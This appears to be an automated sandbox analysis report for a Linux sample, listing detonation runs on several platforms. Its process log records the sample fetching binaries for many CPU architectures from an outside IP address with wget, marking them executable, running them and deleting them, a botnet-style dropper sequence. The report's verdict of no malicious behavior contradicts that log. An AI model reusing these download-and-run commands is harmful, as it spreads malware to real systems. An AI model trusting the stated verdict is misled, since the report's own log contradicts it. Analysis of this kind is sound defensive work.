Analysis Overview
SHA256
f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682
Threat Level: No (potentially) malicious behavior was detected
The file 15917961bac6063481040fcc4af85061_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-05-05 02:27
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-05 02:27
Reported
2024-05-05 03:02
Platform
debian9-mipsbe-20240418-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-05 02:27
Reported
2024-05-05 03:03
Platform
debian9-mipsel-20240226-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-05 02:27
Reported
2024-05-05 03:05
Platform
ubuntu1804-amd64-20240418-en
Max time kernel
36s
Max time network
129s
Command Line
Signatures
Processes
/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118
[/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.138/mips]
/bin/chmod
[chmod +x mips]
/tmp/mips
[./mips]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.95.168.138/mipsel]
/bin/chmod
[chmod +x mipsel]
/tmp/mipsel
[./mipsel]
/bin/rm
[rm -rf mipsel]
/usr/bin/wget
[wget http://45.95.168.138/sh4]
/bin/chmod
[chmod +x sh4]
/tmp/sh4
[./sh4]
/bin/rm
[rm -rf sh4]
/usr/bin/wget
[wget http://45.95.168.138/x86]
/bin/chmod
[chmod +x x86]
/tmp/x86
[./x86]
/bin/rm
[rm -rf x86]
/usr/bin/wget
[wget http://45.95.168.138/armv6l]
/bin/chmod
[chmod +x armv6l]
/tmp/armv6l
[./armv6l]
/bin/rm
[rm -rf armv6l]
/usr/bin/wget
[wget http://45.95.168.138/i686]
/bin/chmod
[chmod +x i686]
/tmp/i686
[./i686]
/bin/rm
[rm -rf i686]
/usr/bin/wget
[wget http://45.95.168.138/powerpc]
/bin/chmod
[chmod +x powerpc]
/tmp/powerpc
[./powerpc]
/bin/rm
[rm -rf powerpc]
/usr/bin/wget
[wget http://45.95.168.138/i586]
/bin/chmod
[chmod +x i586]
/tmp/i586
[./i586]
/bin/rm
[rm -rf i586]
/usr/bin/wget
[wget http://45.95.168.138/m68k]
/bin/chmod
[chmod +x m68k]
/tmp/m68k
[./m68k]
/bin/rm
[rm -rf m68k]
/usr/bin/wget
[wget http://45.95.168.138/sparc]
/bin/chmod
[chmod +x sparc]
/tmp/sparc
[./sparc]
/bin/rm
[rm -rf sparc]
/usr/bin/wget
[wget http://45.95.168.138/armv4l]
/bin/chmod
[chmod +x armv4l]
/tmp/armv4l
[./armv4l]
/bin/rm
[rm -rf armv4l]
/usr/bin/wget
[wget http://45.95.168.138/armv5l]
/bin/chmod
[chmod +x armv5l]
/tmp/armv5l
[./armv5l]
/bin/rm
[rm -rf armv5l]
Network
| Country | Destination | Domain | Proto |
| US | 151.101.194.49:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 195.181.164.19:443 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-05 02:27
Reported
2024-05-05 03:05
Platform
debian9-armhf-20240418-en
Max time network
38s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp | |
| HR | 45.95.168.138:80 | tcp |